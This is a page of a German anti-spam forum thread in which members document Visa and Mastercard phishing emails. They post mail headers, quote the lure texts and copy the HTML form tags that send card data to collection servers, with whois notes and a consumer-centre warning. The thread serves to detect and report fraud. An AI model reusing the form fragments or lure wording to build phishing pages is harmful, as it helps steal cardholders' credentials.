Seite 2 von 8 ErsteErste 1234 ... LetzteLetzte
Ergebnis 11 bis 20 von 72

Thema: Visa-Card Phishing

  1. #11
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.602

    Standard

    Wieder mal mit HTML-Anhang

    header:
    01: Received: from x (x [82.149.229.6])
    02: by x (Postfix) with ESMTP ID: [ID filtered]
    03: for <x>; Fri, 9 Sep 2011 xx:xx:xx +0200 (CEST)
    04: X-Greylist: delayed 831 seconds by postgrey-1.32 at spamgate; Fri, 09 Sep 2011 xx:xx:xx
    05: CEST
    06: Received: from h1870429.stratoserver.net (ptclean.de [85.214.41.149])
    07: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
    08: (No client certificate requested)
    09: by x (Postfix) with ESMTPS ID: [ID filtered]
    10: for <x>; Fri, 9 Sep 2011 xx:xx:xx +0200 (CEST)
    Gephished wird hier whois: [Link nur für registrierte Mitglieder sichtbar. ]/img/icons/tabs/tab.php und hier whois: [Link nur für registrierte Mitglieder sichtbar. ]/.ssh/a.php
    [html]<FORM action="http://www.80m.co.uk/img/icons/tabs/tab.php" name="PC_7_2_1661_cam10To30Form" id="PC_7_2_1661_inputForm" method="POST" AUTOCOMPLETE="off">
    [...]
    <FORM action="http://217.16.178.253/.ssh/a.php" name="PC_7_2_1661_cam10To30Form" id="PC_7_2_1661_inputForm" method="POST" AUTOCOMPLETE="off">[/html]
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  2. #12
    Mitglied Avatar von ute
    Registriert seit
    12.08.2011
    Ort
    Norddeutschland
    Beiträge
    117

    Standard

    Bei mir gestern mit HTML-Anhang

    http://211.206.120.142/auth.php

    und vorgestern:

    http://218.26.42.112/contact.php

    Die werden einfach nicht müde....
    lG
    Ute
    Mein mühsam lesbares Avatar sagt "You won't find me on Facebook". Auf allen anderen "social networks" wirst Du mich auch nicht finden. Etwas Privatsphäre muß bleiben...

  3. #13
    Ritter der Tafelrunde Avatar von Arthur
    Registriert seit
    15.01.2007
    Ort
    Avalon
    Beiträge
    13.392

    Standard

    http://www.vz-nrw.de/UNIQ131558376717399/link925921A
    Zitat Zitat von Pressemitteilung der Verbraucherzentrale Nordrhein-Westfalen
    Die Verbraucherzentrale NRW warnt vor verdächtigen E-Mails, die auf Kunden der Kreditkartenunternehmen Visacard und Mastercard zielen. Die Betreffzeile dieser Phishing-E-Mails lautet "Sicherheitshinweis 3D Secure" und stammt angeblich von Arcot-Secure. Dies ist besonders tückisch, weil es tatsächlich eine Firma namens Arcot gibt, die ihren Sitz in den USA hat und mit technischen Dienstleistungen rund um das neue Sicherheitsverfahren "3D Secure" betraut ist. Tatsächlich aber kommt die E-Mail von einem Absender, der eine Webseite letzte Woche in der Ukraine angemeldet hat.

  4. #14
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Wieder mal:


    header:
    01: Received: from tfas.jp (HELO tfas.jp) [210.150.207.108]
    02: by mx0.gmx.net (mx091) with SMTP; 28 Oct 2011 xx:xx:xx +0200
    03: Received: (qmail 32038 invoked by SAV 20111027.036 by UID: [UID filtered]
    04: 2011 xx:xx:xx +0900
    05: X-Authentication: info was authenticated by 210.150.207.108
    06: at 28 Oct 2011 xx:xx:xx +0900
    07: Received: from unknown (HELO phishing.visa-mastercard.de) (62.28.57.138)
    08: by ps61.suite2.arena.ne.jp (210.150.207.108) with SMTP; 28 Oct 2011
    09: xx:xx:xx +0900

    IP: 62.28.57.138 ---> MOBBITTMN-NET

    Dann jede Menge HTML-Geraffel, was ich mir spare. Der Übeltäter sitzt hier:

    Code:
    <form action="http://222.122.81.53/verifikation/konfirmation.php" name="processForm" method="POST" onsubmit="return submitIt(this)">
    whois: [Link nur für registrierte Mitglieder sichtbar. ] ---> KOREA TELECOM
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  5. #15
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Phishki ist wieder unterwegs:


    header:
    01: Received: from ns1.aldanube.com (EHLO exch.aldanube.com) [213.42.90.99]
    02: by mx0.gmx.net (mx030) with SMTP; 01 Nov 2011 xx:xx:xx +0100
    03: X-TM-IMSS-Message-ID:<63cf47320002b6bf [at] aldanube.com>
    04: Received: from danube-exng-1.aldanube.local ([192.168.1.42]) by
    05: aldanube.com ([192.168.222.2]) with ESMTP (TREND IMSS SMTP Service 7.1)
    06: ID: [ID filtered]
    07: Received: from danube-exng-2.aldanube.local (192.168.1.43) by
    08: danube-exng-1.aldanube.local (192.168.1.42) with Microsoft SMTP Server
    09: (TLS)
    10: ID: [ID filtered]
    11: Received: from support.kreditkarten.de (62.28.57.138) by
    12: danube-exng-2.aldanube.local (192.168.1.43) with Microsoft SMTP Server id
    13: 8.2.255.0; Tue, 1 Nov 2011 xx:xx:xx +0400

    IP: 62.28.57.138 ---> MOBBITTMN-NET

    Wieder das HTML-Geraffel, darin dann:

    Code:
    <form action="http://rsag.dvlmilieu.nl/index1.php" name="processForm" method="POST" onsubmit="return submitIt(this)">
    IP: 85.158.249.66 ---> vps01.dvlmilieu.nl/IT-Ernity Internet Services BV
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  6. #16
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Und wieder Phiski:


    header:
    01: Received: from 211-20-82-138.HINET-IP.hinet.net (EHLO dns.ebm.com.tw)
    02: [211.20.82.138]
    03: by mx0.gmx.net (mx031) with SMTP; 10 Nov 2011 xx:xx:xx +0100
    04: Received: from dns.ebm.com.tw (localhost [127.0.0.1])
    05: by dns.ebm.com.tw (Postfix) with ESMTP ID: [ID filtered]
    06: for xxxxx; Thu, 10 Nov 2011 xx:xx:xx +0800 (CST)
    07: Received: from kreditkarte.visa-mastercard.de (unknown [62.28.57.138])
    08: by dns.ebm.com.tw (Postfix) with ESMTP ID: [ID filtered]
    09: for xxxxx; Thu, 10 Nov 2011 xx:xx:xx +0800 (CST)

    IP: 62.28.57.138 ---> MOBBIT TMN CORPORATE TV

    Mindestens seit dem 28. 10. bläst der Gangster seinen Dreck also über die IP 62.28.57.138 raus. Und dies bei einem Provider mitten in Europa. Somit kann ich für MOBBIT TMN CORPORATE TV konstatieren, dass man dort anscheinend nach dem Motto 'legal, illegal, scheissegal' arbeitet.

    Auch hier wieder mit HMTL-Geraffel im Anhang, das Schadskript zum Datenversand findet man unter:

    Code:
    form action="http://61.235.73.254/index.php"
    IP: 61.235.73.254 ---> China Railcom Guangdong

    Also die chines. Eisenbahn, die als Schwarzhut ebenso eine lange Tradition hat. Oder bessert sich da ein unterbezahlter Eisenbähner nebenher noch etwas sein Salär auf?
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  7. #17
    Mitglied Avatar von Johannes
    Registriert seit
    08.01.2007
    Beiträge
    355

    Standard

    Hier flatterte heute auch ein "netter" Phishing-Versuch auf meiner privaten eMail-Addy rein:


    header:
    01: From: - Wed Nov 16 xx:xx:xx 2011
    02: X-Account-Key: account4
    03: X-UIDL: [UID filtered]
    04: X-Mozilla-Status: 0000
    05: X-Mozilla-Status2: 00000000
    06: X-Mozilla-Keys:
    07: X-Envelope-From: <apache [at] indiabazaar.co.uk>
    08: X-Envelope-To: <poor [at] spamvictim.tld>
    09: X-Delivery-Time: 1321439366
    10: X-UID: [UID filtered]
    11: Return-Path: <apache [at] indiabazaar.co.uk>
    12: X-RZG-CLASS-ID: [ID filtered]
    13: Received: from indiabazaar.co.uk (ns2.indiabazaar.co.uk [66.235.184.227]) by
    14: mailin.rzone.de (andre mi20) (RZmta 26.12 OK) with ESMTP ID: [ID filtered]
    15: Received: from indiabazaar.co.uk (localhost.localdomain [127.0.0.1]) by
    16: indiabazaar.co.uk (8.13.8/8.13.8) with ESMTP ID: [ID filtered]
    17: Received: (from apache [at] localhost) by indiabazaar.co.uk (8.13.8/8.13.8/Submit) ID: [ID
    18: filtered]
    19: Date: Wed, 16 Nov 2011 xx:xx:xx +0530
    20: To: poor [at] spamvictim.tld
    21: From: VBV/MSC <secure [at] secure.de>
    22: Reply-To:
    23: Subject: Andern Verified by Visa / MasterCard SecureCode Passwort.
    24: Message-ID: [ID filtered]
    25: X-Priority: 3
    26: X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version ]
    27: MIME-Version: 1.0
    28: Content-Transfer-Encoding: 8bit
    29: Content-Type: text/html; charset="iso-8859-1"


    Falsches Passwort

    Sie haben ein falsches passwort für Verified by Visa gegeben ist dreimal und muss daher beginne ein. Um dies zu tun, stellen sie sicher ihre daten unten. Sobald sie ihr neues passwort aktiviert ist, können sie identifizieren sich selbst und die zahlung per Karte in den von Visa-angeschlossenen Geschäfte Verified.

    Verified by Visa / MasterCard SecureCode Passwort muss wegen der vielen fehlgeschlagenen logins geändert werden.

    Änderung Passwort!


    Hinter dem "Änderung Passwort"-Button liegt folgender Link: whois: [Link nur für registrierte Mitglieder sichtbar. ]

  8. #18
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Wurde die TU Freiberg schon informiert? Die Unis machen da recht schnell tabula rasa.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  9. #19
    Mitglied Avatar von Johannes
    Registriert seit
    08.01.2007
    Beiträge
    355

    Standard

    Zitat Zitat von kjz1 Beitrag anzeigen
    Wurde die TU Freiberg schon informiert? Die Unis machen da recht schnell tabula rasa.
    Nein - aber stimmt, sollte ich tun...

  10. #20
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Visa, garniert mit unseren altbekannten 'Vollpatienten':


    header:
    01: Received: from smtp-out02.msg.oleane.net (EHLO
    02: smtp-out02.msg.oleane.net) [62.161.3.11]
    03: by mx0.gmx.net (mx091) with SMTP; 08 Jan 2012 xx:xx:xx +0100
    04: Received: from smtp26.msg.oleane.net (smtp26.mail.priv [172.17.20.148])
    05: by smtp-out02.msg.oleane.net with ESMTP ID: [ID filtered]
    06: Sun, 8 Jan 2012 xx:xx:xx +0100
    07: Received: from smtp26.msg.oleane.net (localhost [127.0.0.1])
    08: by smtp26.msg.oleane.net (MTA-AV) with ESMTP ID: [ID filtered]
    09: Sun, 8 Jan 2012 xx:xx:xx +0100
    10: Received: from srv-mail.emploi-lystourcoing.local
    11: (177-38.206-83.static-ip.oleane.fr [83.206.38.177]) (authenticated)
    12: by smtp26.msg.oleane.net (MTA) with ESMTP ID: [ID filtered]
    13: Sun, 8 Jan 2012 xx:xx:xx +0100
    14: X-Oleane-Rep: REPA
    15: Received: from User ([176.31.227.5]) by
    16: srv-mail.emploi-lystourcoing.local with Microsoft SMTPSVC(6.0.3790.3959);
    17: Sun, 8 Jan 2012 xx:xx:xx +0100

    IP: 176.31.227.5 ---> ns212113.ovh.net

    VerifedbyvisaVerifedbyvisa

    Hallo Gast Visa Europe,

    Ihre Kreditkarte wurde ausgesetzt, weil wir ein Problem
    festgestellt, auf
    Ihrem Konto.

    Wir haben zu bestimmen,dass jemand Ihre Karte ohne Ihre Erlaubnis
    verwendet
    haben. Für Ihren Schutz haben wir Ihre Kreditkarte aufgehangen. Um diese
    Suspension aufzuheben_*Klicken Sie hier
    whois: [Link nur für registrierte Mitglieder sichtbar. ]*_
    und folgen Sie den Staat zur Aktualisierung der Informationen in Ihrer
    Kreditkarte.

    *Vermerk:* Wenn diese nicht vollständig ist , werden wir gezwungen sein,
    Ihre Karte aussetzen

    Wir bedanken uns fur Ihre Zusammenarbeit in dieser Angelegenheit.

    Dossier n : PP-1124-075-998

    Danke,
    Kunden-Support-Service.


    --------------------------------------------------------------------------------
    Copyright 1999-2011 VerifedbyVisa . Tous droits rйserves.
    IP: 95.211.56.147 ---> da16.com-products.nl/Leaseweb

    Der Kriminelle von Welt benutzt natürlich Weiterleitungen um den eigentlichen Schadserver zu schützen:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 89.110.129.55 ---> eden5.netclusive.de
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

Seite 2 von 8 ErsteErste 1234 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen